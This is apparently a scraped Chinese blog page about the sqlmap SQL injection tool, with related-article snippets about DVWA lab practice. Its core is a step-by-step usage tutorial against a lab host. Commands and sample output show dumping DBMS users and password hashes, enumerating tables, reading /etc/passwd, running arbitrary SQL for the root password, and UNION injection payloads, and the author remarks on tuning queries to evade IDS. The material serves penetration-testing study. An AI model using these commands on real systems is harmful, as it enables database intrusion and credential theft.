本文还有配套的精品资源,点击获取 简介:SQLMap是一个强大的自动化SQL注入工具,它帮助安全专家和渗透测试人员发现和利用Web应用程序中的SQL注入漏洞,实现对数据库的完全控制。该工具能够探测SQL注入、执行数据提取、数据库操作、权限提升,并在某些情况下控制服务器。它还支持自定义脚本和多种技术来探测和利用SQL注入漏洞,同时注重隐秘性,以降低被检测到的风险。SQLMap...
使用sqlmap总是提示需要302跳转重新登录的解决方法
wutiangui的博客
10-01 797
如果给了cookie但发现还是提示需要重新登录,且按它给的提示发现还是找不到注入点,原因是url没有加引号。如果在命令中不指定cookie,sqlmap在执行时会提示需要重新登录。url加了双引号后解决问题。
sqlmap (懂的入)
08-09
Here is a list of major features implemented in sqlmap: * Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server database management system back-end. Besides these four DBMS, sqlmap can also identify Microsoft Access, DB2, Informix and Sybase; * Extensive database management system back-end fingerprint based upon: o Inband DBMS error messages o DBMS banner parsing o DBMS functions output comparison o DBMS specific features such as MySQL comment injection o Passive SQL injection fuzzing * It fully supports two SQL injection techniques: o Blind SQL injection, also known as Inference SQL injection o Inband SQL injection, also known as UNION query SQL injection and it partially supports error based SQL injection as one of the vectors for database management system fingerprint; * It automatically tests all provided GET, POST, Cookie and User- Agent parameters to find dynamic ones. On these it automatically tests and detects the ones affected by SQL injection. Moreover each dynamic parameter is tested for numeric, single quoted string, double quoted string and all of these three type with one and two brackets to find which is the valid syntax to perform further injections with; * It is possible to provide the name of the only parameter(s) that you want to perform tests and use for injection on, being them GET, POST, Cookie parameters; * SQL injection testing and detection does not depend upon the web application database management system back-end. SQL injection exploiting and query syntax obviously depend upon the web application database management system back-end; * It recognizes valid queries by false ones based upon HTML output page hashes comparison by default, but it is also possible to choose to perform such test based upon string matching; * HTTP requests can be performed in both HTTP method GET and POST (default: GET); * It is possible to perform HTTP requests using a HTTP User-Agent header string randomly selected from a text file; * It is possible to provide a HTTP Cookie header string, useful when the web application requires authentication based upon cookies and you have such data; * It is possible to provide an anonymous HTTP proxy address and port to pass by the HTTP requests to the target URL; * It is possible to provide the remote DBMS back-end if you already know it making sqlmap save some time to fingerprint it; * It supports various command line options to get database management system banner, current DBMS user, current DBMS database, enumerate users, users password hashes, databases, tables, columns, dump tables entries, dump the entire DBMS, retrieve an arbitrary file content (if the remote DBMS is MySQL) and provide your own SQL SELECT statement to be evaluated; * It is possible to make sqlmap automatically detect if the affected parameter is also affected by an UNION query SQL injection and, in such case, to use it to exploit the vulnerability; * It is possible to exclude system databases when enumerating tables, useful when dumping the entire DBMS databases tables entries and you want to skip the default DBMS data; * It is possible to view the Estimated time of arrival for each query output, updated in real time while performing the SQL injection attack; * Support to increase the verbosity level of output messages; * It is possible to save queries performed and their retrieved value in real time on an output text file and continue the injection resuming from such file in a second time; * PHP setting magic_quotes_gpc bypass by encoding every query string, between single quotes, with CHAR (or similar) DBMS specific function. 昨天晚上实在忍不住,还是看了一些,然后测试了一下。里面的sql语句太过于简单,不过你可以定制。修改为更富在的语句。以绕过注入检测和其他IDS设 备。 稍晚一下,我编译一个dos版本的给你们。 1、首先安装python2.5。 2、然后进入sqlmap的目录,执行sqlmap 详细用法 1、sqlmap -u 注入点 2、sqlmap -g "关键词“ //这是通过google搜索注入,现在还不可以,不知道是什么原因,可以直接修改为百度 3、 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 [hh:mm:25] [INFO] testing if the url is stable, wait a few seconds [hh:mm:26] [INFO] url is stable [hh:mm:26] [INFO] testing if GET parameter 'id' is dynamic [hh:mm:26] [INFO] confirming that GET parameter 'id' is dynamic [hh:mm:26] [INFO] GET parameter 'id' is dynamic [hh:mm:26] [INFO] testing sql injection on GET parameter 'id' [hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter 'id' [hh:mm:26] [INFO] confirming numeric/unescaped injection on GET parameter 'id' [hh:mm:26] [INFO] GET parameter 'id' is numeric/unescaped injectable [hh:mm:26] [INFO] testing MySQL [hh:mm:26] [INFO] query: CONCAT('5', '5') [hh:mm:26] [INFO] retrieved: 55 [hh:mm:26] [INFO] performed 20 queries in 0 seconds [hh:mm:26] [INFO] confirming MySQL [hh:mm:26] [INFO] query: LENGTH('5') [hh:mm:26] [INFO] retrieved: 1 [hh:mm:26] [INFO] performed 13 queries in 0 seconds [hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1 [hh:mm:26] [INFO] retrieved: 5 [hh:mm:26] [INFO] performed 13 queries in 0 seconds remote DBMS: MySQL >= 5.0.0 4、指定参数注入 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -p "id" [hh:mm:17] [INFO] testing if the url is stable, wait a few seconds [hh:mm:18] [INFO] url is stable [hh:mm:18] [INFO] testing sql injection on parameter 'id' [hh:mm:18] [INFO] testing numeric/unescaped injection on parameter 'id' [hh:mm:18] [INFO] confirming numeric/unescaped injection on parameter 'id' [hh:mm:18] [INFO] parameter 'id' is numeric/unescaped injectable [...] Or if you want to provide more than one parameter, for instance: $ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -p "cat,id" 5、指定方法和post的数据 python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" -- data "id=1&cat=2" 6、指定cookie,可以注入一些需要登录的地址 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --cookie "COOKIE_VALUE" 7、通过代理注入 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy "http://127.0.0.1:8118" 8、指定关键词,也可以不指定。程序会根据返回结果的hash自动判断 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string "STRING_ON_TRUE_PAGE" 9、指定数据,这样就不用猜测其他的数据库里。可以提高效率。 --remote-dbms 10、指纹判别数据库类型 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f 11、获取banner信息 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -b banner: '5.0.38-Ubuntu_0ubuntu1.1-log' 12、获取当前数据库,当前用户,所有用户,密码,所有可用数据库。 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -- current-db current database: 'testdb' python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --users database management system users [5]: [*] 'debian-sys-maint'@'localhost' [*] 'root'@'127.0.0.1' [*] 'root'@'leboyer' [*] 'root'@'localhost' [*] 'testuser'@'localhost' python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -- passwords database management system users password hashes: [*] debian-sys-maint [1]: password hash: *XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [*] root [1]: password hash: *YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY [*] testuser [1]: password hash: *ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --dbs available databases [3]: [*] information_schema [*] mysql [*] testdb python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --tables -D "information_schema" Database: information_schema [16 tables] +---------------------------------------+ | CHARACTER_SETS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLLATIONS | | COLUMN_PRIVILEGES | | COLUMNS | | KEY_COLUMN_USAGE | | ROUTINES | | SCHEMA_PRIVILEGES | | SCHEMATA | | STATISTICS | | TABLE_CONSTRAINTS | | TABLE_PRIVILEGES | | TABLES | | TRIGGERS | | USER_PRIVILEGES | | VIEWS | +---------------------------------------+ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -- columns -T "user" -D "mysql" Database: mysql Table: user [37 columns] +-----------------------+------+ | Column | Type | +-----------------------+------+ | Alter_priv | enum | | Alter_routine_priv | enum | | Create_priv | enum | | Create_routine_priv | enum | | Create_tmp_table_priv | enum | | Create_user_priv | enum | | Create_view_priv | enum | | Delete_priv | enum | | Drop_priv | enum | | Execute_priv | enum | | File_priv | enum | | Grant_priv | enum | | Host | char | | Index_priv | enum | | Insert_priv | enum | | Lock_tables_priv | enum | | max_connections | int | | max_questions | int | | max_updates | int | | max_user_connections | int | | Password | char | | Process_priv | enum | | References_priv | enum | | Reload_priv | enum | | Repl_client_priv | enum | | Repl_slave_priv | enum | | Select_priv | enum | | Show_db_priv | enum | | Show_view_priv | enum | | Shutdown_priv | enum | | ssl_cipher | blob | | ssl_type | enum | | Super_priv | enum | | Update_priv | enum | | User | char | | x509_issuer | blob | | x509_subject | blob | +-----------------------+------+ 13、显示指定的文件内容,一般用于php python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --file / etc/passwd /etc/passwd: --- root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/false backup:x:34:34:backup:/var/backups:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false postgres:x:105:107:PostgreSQL administrator,,,:/var/lib/postgresql:/ bin/bash inquis:x:1000:100:Bernardo Damele,,,:/home/inquis:/bin/bash --- 14、执行你自己的sql语句。 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -e "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1" [hh:mm:18] [INFO] fetching expression output: 'SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1' [hh:mm:18] [INFO] query: SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1 [hh:mm:18] [INFO] retrieved: YYYYYYYYYYYYYYYY [hh:mm:19] [INFO] performed 118 queries in 0 seconds SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1: 'YYYYYYYYYYYYYYYY' 15、union注入 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --union- check valid union: 'http://192.168.1.47/page.php?id=1 UNION ALL SELECT NULL, NULL, NULL--&cat=2' python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -- union-use --banner [...] [hh:mm:24] [INFO] testing inband sql injection on parameter 'id' [hh:mm:24] [INFO] the target url could be affected by an inband sql injection vulnerability [hh:mm:24] [INFO] confirming inband sql injection on parameter 'id' [...] [hh:mm:24] [INFO] fetching banner [hh:mm:24] [INFO] request: http://192.168.1.47/page.php?id=1 UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), VERSION(), CHAR(95,95,83,84,79,80,95,95)), NULL, NULL--&cat=2 [hh:mm:24] [INFO] performed 1 queries in 0 seconds banner: '5.0.38-Ubuntu_0ubuntu1.1-log' 16、保存注入过程到一个文件,还可以从文件恢复出注入过程,很方便,一大特色。你可以在注入的时候中断,有时间再继续。 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -b - o "sqlmap.log" [...] [hh:mm:09] [INFO] fetching banner [hh:mm:09] [INFO] query: VERSION() [hh:mm:09] [INFO] retrieved: 5.0.30-Debian_3-log [hh:mm:11] [INFO] performed 139 queries in 1 seconds banner: '5.0.38-Ubuntu_0ubuntu1.1-log' python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -- banner -o "sqlmap.log" --resume [...] [hh:mm:13] [INFO] fetching banner [hh:mm:13] [INFO] query: VERSION() [hh:mm:13] [INFO] retrieved the length of query: 26 [hh:mm:13] [INFO] resumed from file 'sqlmap.log': 5.0.45-Deb [hh:mm:13] [INFO] retrieved: ian_1ubuntu3-log banner:
dvwaVulnerability: SQL Injection使用sqlmap
最新发布
03-24
好的,我需要帮助用户了解如何使用sqlmap测试DVWA中的SQL注入漏洞。首先,用户可能需要知道DVWA是一个演练环境,用来学习Web应用的安全漏洞。SQL注入是其中一种常见漏洞,sqlmap是一个自动化检测和利用SQL注入的工具...
DVWA靶场-SQL Injection(难度低、中、高)-sqlmap自动化漏洞扫描
weixin_43850721的博客
12-14 3121
此处使用docker容器搭建靶场。使用docker平台即可实现靶场的快速搭建,比较方便。使用docker搜索dvwa镜像:docker search dvwa。此处选择第一个镜像文件下载:docker pull citizenstig/dvwa。下载完毕后,可以使用docker images来查看所有的镜像,从中可以找到dvwa。
详解强大的SQL注入工具——SQLMAP
05-09
SQLMAP是一个开源的渗透测试工具,专门用于自动探测和利用SQL注入漏洞。SQLMAP不仅可以在Windows平台上使用,同时也支持Linux平台,它的设计目标是为了帮助数据库管理员(DBA)和安全研究人员检测数据库配置的安全性...
【渗透测试】 sqlmap工具注入-基于dvwa的sql injection_dvwa sql注入 sqlmap
2401_84968269的博客
05-13 1266
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
sql注入攻击原理与实践
05-06
信息安全 专业实训 主流数据库sql注入攻击原理与实践
sqlmap的一些基本使用
weixin_45647970的博客
04-27 1052
有些网站需要登入的所以必须加cookie绕过登入,不需要登入则不用加 ---------------------------------------------------------------------------------- 一般步骤: sqlmap.py -u “http://xxx/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”...
SQLmap实战记录
积木网络
08-22 1万+
【-u/--url="url"】 #后面接目标网址,表示测试的目标地址。 【-v/--level=number】 #number=[0-5],表示测试结果的详细程度。数值越大,内容越详细。 sqlmap.py -u “url” -v 0-5 或 sqlmap.py --url="url" --level=0-5 通过以上参数,会得到: 1、目标的操作系统信息 2、数据库的类
通过sqlnamp检测sql注入漏洞
diexingtao9618的博客
09-16 1255
通过sqlnamp检测sql注入漏洞 1 sql注入概述并安装SQLmap漏洞查看工具 2 安装渗透测试演练系统DVWA 3 实战-使用SQLmap进行sql注入并获得后台管理员adnim帐号和密码 注: 网页最好不要使用GET方式提交,GET是明文方式进行提交,应该使用POST方式进行提交。 1.1 sql注入概述 所谓SQL注入,就是通过把SQL命令插入到...
SQLmap检测sql注入漏洞
weixin_30826095的博客
08-24 788
(1).SQL概念   所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。它是利用现有应用程序,可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库。比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。例:123...
sqlmap表找不到
3569
02-11 5657
以下是从SQLMAP帮助文档中看到的,希望有用。 暴力破解表名 参数:–common-tables 当使用–tables无法获取到数据库的表时,可以使用此参数。 通常是如下情况: 1、MySQL数据库版本小于5.0,没有information_schema表。 2、数据库是Microssoft Access,系统表MSysObjects是不可读的(默认)。 3、当前用户没有权限读取系
SQLMap 使用参数详解
热门推荐
qq_37019068的博客
10-09 2万+
SQLMap 使用参数详解 SQLMap是一款自动化的SQL注入测试工具,在kali上已集成 如果不想使用kali的话,可以从github上直接拉取开源项目 git clone https://github.com/sqlmapproject/sqlmap.git 注:最新版的sqlmap应该是支持python3的,但是如果python3无法使用的话可以试试切换成python2执行 常见参数 -h 输出参数说明 -hh 输出详细的参数
sql注入pythonpoco_骑士CMS后台SQL注入 | CN-SEC 中文网
weixin_39753213的博客
02-11 232
摘要漏洞文件:admin/admin_feedback.php代码82行:跟下get_report_list:$_GET[‘reporttype’]漏洞文件:admin/admin_feedback.php代码82行:if (!empty($_GET['reporttype'])) { $wheresql=empty($wheres...
Sqlmap使用教程
B-Tree
02-24 4204
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。   sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值